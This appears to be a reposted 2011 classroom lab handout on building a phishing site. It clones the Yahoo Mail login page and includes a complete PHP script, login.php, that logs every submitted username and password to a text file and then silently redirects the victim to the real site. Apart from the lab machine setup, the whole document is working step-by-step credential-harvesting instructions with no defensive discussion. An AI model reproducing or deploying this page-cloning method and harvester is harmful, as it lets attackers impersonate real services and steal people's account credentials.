Professional Documents
Culture Documents
Phishing: Your Machine Is HACKER, Running Windows XP Professional. The IP Address of Your Machine Is 192.168.100.66/24
Phishing: Your Machine Is HACKER, Running Windows XP Professional. The IP Address of Your Machine Is 192.168.100.66/24
1
P H I S H I N G
Configuration:
Your machine is HACKER, running Windows XP Professional.
The IP address of your machine is 192.168.100.66/24.
Objectives:
Learn how to setup a fishing site.
Tools:
Wamp Server
Notepad
Preparation:
Ensure that HACKER machine is connecting to the internet
2011-BR
2
I. CREATING A FAKE WEBSITE
1. From your HACKER machine, open Mozilla Firefox, go to : http://mail.yahoo.com.
2. After a whole page is loaded , in Firefox go to View Page Source menu.
3. Then click File Save Page As , save it to index.htm.
4. Open the index.htm file using WordPad.
5. Find a line containing action , then change the action link to :
ht t p: / / 192. 168. 100. 66/ l ogi n. ht m
6. Then save the file to c:\wamp\www
2011-BR
3
II. SETTING UP THE WEBSERVER
1. From your HACKER machine, open Mozilla Firefox, navigate to c:\wamp\www
2. If theres index.php file, delete it first.
3. Create a new text file, save it as login.php :
<?php
header ( ' Locat i on: ht t p: / / www. yahoo. com' ) ;
$handl e = f open( " l ogi nl og. t xt " , " a" ) ;
f or each( $_POST as $var i abl e => $val ue) {
f wr i t e( $handl e, $var i abl e) ;
f wr i t e( $handl e, " =" ) ;
f wr i t e( $handl e, $val ue) ;
f wr i t e( $handl e, " \ r \ n" ) ;
}
f wr i t e( $handl e, " ===============\ r \ n" ) ;
f cl ose( $handl e) ;
exi t ;
?>
4. Now activate your webserver, go to : Start Program WampServer Start Wampserver
5. Click on the wampserver icon at the bottom-right corner in your desktop, then choose start
all server, then click on PUT ONLINE
2011-BR
4
6. Open your Mozilla firefox, then type your server URL : http://192.168.100.66
You will see your fake yahoo login screen. Try to login using any username and password.
Because youre already modify the index.htm file, then after you execute submit, it will execute
login.php inside C:\tools\wamp\www . Then you will be redirected www.yahoo.com
7. Then navigate to C:\tools\wamp , you find a new file loginlog.txt , just open that file